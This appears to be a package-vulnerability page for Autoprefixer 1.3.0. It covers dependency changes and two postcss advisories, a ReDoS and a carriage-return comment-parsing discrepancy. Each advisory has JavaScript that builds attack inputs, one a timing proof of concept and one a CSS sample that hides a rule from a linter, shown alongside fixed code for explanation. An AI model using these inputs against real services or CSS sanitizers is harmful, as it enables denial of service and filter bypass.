Autoprefixer 1.3.0 introduces a few small but notable changes over 1.2.0. Both versions do the same job: parse CSS and add vendor prefixes automatically, using browser-support data from the "Can I Use" database (the caniuse-db package). The main difference is how that dependency is declared. Version 1.3.0 requires caniuse-db "1.0.20140618 - 2", tying it to a specific date-stamped state of the database, whereas 1.2.0 used the tilde range ~1.0, which accepts any 1.0.x release. The tighter requirement in 1.3.0 suggests a fix or feature that depends on a particular state of the browser-support data. Browserify moved from 4.1.9 to 4.1.11, a patch-level bump that may carry bug fixes relevant to projects that bundle Autoprefixer with Browserify. The development dependencies are otherwise unchanged, so contributors keep the same test setup. Developers should consider 1.3.0 if they need Autoprefixer's output to track a known caniuse-db state or if they use Browserify, while keeping in mind that the prefixes emitted change with the database version the package is bound to.
All vulnerabilities related to version 1.3.0 of the package (both are in its postcss dependency)
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, and 8.x versions before 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*): the unbounded (.*) runs to the end of the input and then backtracks one character at a time whenever the closing */ is missing, so an input that repeats the annotation prefix without ever closing the comment makes the cost grow quadratically with its length. The proof of concept below (from the advisory) parses progressively longer inputs of that shape and prints how long each parse takes.
var postcss = require("postcss");

// Build "a{}" followed by n source-map annotation prefixes and no closing "*/",
// so the annotation regex has to scan to the end of the input from every "/*".
function build_attack(n) {
  var ret = "a{}";
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL=";
  }
  return ret + "!";
}

// Warm up on a benign annotation, then time the parse of ever larger attack strings.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    try {
      postcss.parse(attack_str);
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
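The proof of concept above only shows the symptom. As an added example (not postcss source and not the advisory's code), the block below places a regex modelled on the quoted sub-pattern next to a linear-time replacement that walks the comments with indexOf, so the quadratic behaviour and the fix can be compared on the same input. The regex shape, the function names, buildAttack and the constructed inputs are this example's own.

```javascript
// Added example: a regex modelled on the advisory's sub-pattern beside a
// linear-time replacement. Not postcss source; names and regex shapes are
// this example's own.

// Greedy (.*) with a terminator the attacker never supplies: from every
// "/*" the engine runs to the end of the line, then backtracks one character
// at a time looking for "*/". n annotations times ~21*n bytes each is quadratic.
const ANNOTATION_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//gm;

function loadAnnotationRegex(css) {
  let last = null;
  for (const m of css.matchAll(ANNOTATION_RE)) last = m[1];
  return last === null ? null : last.trim();
}

// Linear alternative: walk the comments with indexOf. Each search resumes
// where the previous one stopped, so every byte is visited a bounded number
// of times whatever the input repeats. A comment ends at the first "*/",
// as a CSS tokenizer would end it.
const MARKER = '# sourceMappingURL=';

function loadAnnotationLinear(css) {
  let url = null;
  let pos = 0;
  for (;;) {
    const open = css.indexOf('/*', pos);
    if (open === -1) break;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) break; // unterminated comment: nothing after it can close
    const body = css.slice(open + 2, close).replace(/^\s+/, '');
    if (body.startsWith(MARKER)) url = body.slice(MARKER.length).trim(); // keep the last
    pos = close + 2;
  }
  return url;
}

// Constructed input with the same shape as the advisory's PoC: n annotation
// prefixes and a trailing "!", so no "*/" ever appears.
function buildAttack(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

function timeMs(fn, input) {
  const t0 = Date.now();
  fn(input);
  return Date.now() - t0;
}

const BENIGN = 'a{}/*# sourceMappingURL=a.css.map */';

// Stand-alone run: doubling n roughly quadruples the regex time while the
// linear version stays flat.
for (const n of [500, 1000, 2000]) {
  const attack = buildAttack(n);
  console.log(
    'n=' + n + ' bytes=' + attack.length +
    ' regex=' + timeMs(loadAnnotationRegex, attack) + 'ms' +
    ' linear=' + timeMs(loadAnnotationLinear, attack) + 'ms'
  );
}
```

Both functions return a.css.map for the benign input and null for the attack input; the difference is only in how long the regex takes to reach null. The greedy capture has a second drawback worth noting when replacing it: on a line holding two annotation comments it swallows everything up to the last */, so the returned URL contains the first comment's closing delimiter, whereas the indexOf walk closes each comment at its own */.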
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts which a browser treats as a CSS comment but which PostCSS tokenizes differently. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite being originally inside a comment, so a linter or sanitizer built on PostCSS and the browser that finally renders the stylesheet disagree about which text is live.
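The mechanism behind the \r discrepancy is a JavaScript regex detail: the . metacharacter never matches a line terminator, and \r is one. As an added example (not PostCSS source), the block below models a tokenizer shortcut that hands the text between ( and the next ) over as a single opaque token unless it contains a character needing real tokenization, and shows how a bare \r right before /* slips past a check written with . and a class that lacks \r. The two patterns, the tokenize and liveCss helpers and the SAMPLE string are this example's own, built around the advisory's @font-face{ font:(\r/*);} fragment; they are modelled on the shape of such a shortcut, not quoted from the fixed code.

```javascript
// Added example, not PostCSS source: a minimal model of a bracket shortcut in a
// CSS tokenizer. The text from "(" to the next ")" becomes one opaque token
// unless a "bad bracket" pattern says it needs proper tokenizing. In a
// JavaScript regex "." never matches "\r", so with the first pattern neither
// "(\r" nor "\r/" can ever be flagged; adding "\r" to the class fixes that.
const BAD_BRACKET_OLD = /.[\n"'(\/\\]/;
const BAD_BRACKET_FIXED = /.[\r\n"'(\/\\]/;

// Coarse tokens: ['comment', text] | ['brackets', text] | ['text', text]
function tokenize(css, badBracket) {
  const tokens = [];
  let text = '';
  let pos = 0;
  const flush = () => {
    if (text) tokens.push(['text', text]);
    text = '';
  };
  while (pos < css.length) {
    const ch = css[pos];
    if (ch === '/' && css[pos + 1] === '*') {
      // "/*" opens a comment that ends at the first "*/" (browser behaviour)
      flush();
      const end = css.indexOf('*/', pos + 2);
      const stop = end === -1 ? css.length : end + 2;
      tokens.push(['comment', css.slice(pos, stop)]);
      pos = stop;
    } else if (ch === '(') {
      const close = css.indexOf(')', pos + 1);
      const content = close === -1 ? '' : css.slice(pos, close + 1);
      if (close !== -1 && !badBracket.test(content)) {
        // Shortcut taken: the whole "(...)" is one token and a "/*" inside
        // it is never seen as a comment opener.
        flush();
        tokens.push(['brackets', content]);
        pos = close + 1;
      } else {
        text += ch;
        pos += 1;
      }
    } else {
      text += ch;
      pos += 1;
    }
  }
  flush();
  return tokens;
}

// The CSS a consumer acts on: every token that is not a comment.
function liveCss(tokens) {
  return tokens.filter(t => t[0] !== 'comment').map(t => t[1]).join('');
}

// Constructed sample around the advisory's fragment. A browser opens a comment
// at the "/*" inside the parentheses and closes it at the first "*/", so
// ".injected" is commented out; the old shortcut keeps it live.
const SAMPLE = '@font-face{ font:(\r/*);} .injected{display:none} /**/ a{}';

console.log('old   :', JSON.stringify(liveCss(tokenize(SAMPLE, BAD_BRACKET_OLD))));
console.log('fixed :', JSON.stringify(liveCss(tokenize(SAMPLE, BAD_BRACKET_FIXED))));
```

With the old pattern the live CSS still contains the .injected rule, which a linter would then check, rewrite or pass through even though the browser discards it as comment text; with \r in the class the shortcut is refused, the /* is tokenized as a comment opener and the live CSS matches what the browser sees. Replacing \r with \n in the same sample is caught by both patterns, which is why only the carriage return was affected.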